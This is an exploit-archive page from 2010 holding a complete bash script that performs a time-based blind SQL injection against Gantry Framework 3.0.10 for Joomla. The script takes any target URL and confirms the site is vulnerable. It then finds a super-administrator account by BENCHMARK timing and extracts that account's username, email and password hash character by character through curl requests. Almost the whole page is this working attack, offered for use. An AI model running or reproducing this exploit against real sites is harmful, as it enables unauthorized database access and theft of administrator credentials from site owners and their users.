Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit
Posted on 06 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================ Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit ============================================================ #!/bin/bash # Exploit Title: Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit # Date: 4 September 2010 # Author: jdc # Software Link: http://www.gantry-framework.org # Version: 3.0.10 # Patched: 3.0.11 if [ "$1" == "" ] then echo "$0 usage: $0 url [debug]" echo "" exit 1 fi clear echo "##############################################################" echo "## Gantry Framework 3.0.10 Blind SQL Injection Exploit ##" echo "##############################################################" echo "" echo " Probing target $1 ..." echo "" GANTRY_PATH="$1/index.php" GANTRY_TIMEOUT="5" GANTRY_DELAY="10" GANTRY_AGENT='Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)' GANTRY_DATA="option=com_gantry&tmpl=gantry-ajax&model=module&moduleid=" GANTRY_BENCHMARK="10000000" GANTRY_ADMIN_ID="" GANTRY_OUTPUT="" GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" GANTRY_TEST=`curl -s -A "$GANTRY_AGENT" -d "$GANTRY_DATA$GANTRY_EXPLOIT" "$GANTRY_PATH"` GANTRY_REQUESTS="1" if [ "Direct access not allowed." != "$GANTRY_TEST" ] then echo $GANTRY_TEST echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "!! Site not vulnerable. Bailing! !!" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 1 fi echo -n " Trying to get a super admin id... " for N in `seq 62 9999` do GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$N),BENCHMARK($GANTRY_BENCHMARK,MD5(1)),16)" GANTRY_TIME="`curl -s -A "$GANTRY_AGENT" -o /dev/null -w '%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d "$GANTRY_DATA$GANTRY_EXPLOIT" $GANTRY_PATH`" GANTRY_REQUESTS=`echo "$GANTRY_REQUESTS + 1" | bc` if [ "" != "$2" ] then printf "$N" echo " $GANTRY_TIME" fi if [ `echo "$GANTRY_TIME > $GANTRY_TIMEOUT" | bc` == 1 ] then GANTRY_ADMIN_ID="$N" break fi sleep $GANTRY_DELAY done if [ "" == $GANTRY_ADMIN_ID ] then echo "FAILED!" echo "" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "!! Injection FAILED! !!" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 1 fi echo $GANTRY_ADMIN_ID echo " Fetching admin info (this WILL take a while)... " echo "" echo -n " > " for I in `seq 1 250` do GANTRY_LENGTH=`echo "$GANTRY_OUTPUT" | wc -c` GANTRY_CONTINUE=0 #a,d,m,i,n,b-c,e-h,j-l,o-z,A-Z,0-9,special chars for J in `seq 97 97;seq 100 100;seq 109 109;seq 105 105;seq 110 110;seq 98 99;seq 101 104;seq 106 108;seq 111 122;seq 65 90;seq 48 57;seq 32 47;seq 58 64;seq 91 96;seq 123 126` do if [ 1 == $GANTRY_CONTINUE ] then continue fi sleep $GANTRY_DELAY GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$GANTRY_ADMIN_ID%20AND%20ASCII(SUBSTRING(CONCAT(username,0x3a,email,0x3a,password),$I,1))=$J),BENCHMARK(10000000,MD5(1)),16)" GANTRY_TIME="`curl -s -A "$GANTRY_AGENT" -o /dev/null -w '%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d "$GANTRY_DATA$GANTRY_EXPLOIT" $GANTRY_PATH`" GANTRY_REQUESTS=`echo "$GANTRY_REQUESTS + 1" | bc` if [ "" != "$2" ] then printf "x$(printf %x $J)" echo " $GANTRY_TIME" fi if [ `echo "$GANTRY_TIME > $GANTRY_TIMEOUT" | bc` == 1 ] then LETTER=`printf "x$(printf %x $J)"` GANTRY_OUTPUT="$GANTRY_OUTPUT$LETTER" GANTRY_CONTINUE=1 if [ "" == "$2" ] then echo -n "$LETTER" fi fi done GANTRY_LENGTH2=`echo "$GANTRY_OUTPUT" | wc -c` if [ "$GANTRY_LENGTH" == "$GANTRY_LENGTH2" ] then break fi done echo "" if [ "$GANTRY_OUTPUT" == "" ] then echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "!! Injection FAILED! !!" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 1 fi echo "" echo "$GANTRY_OUTPUT" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 0 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
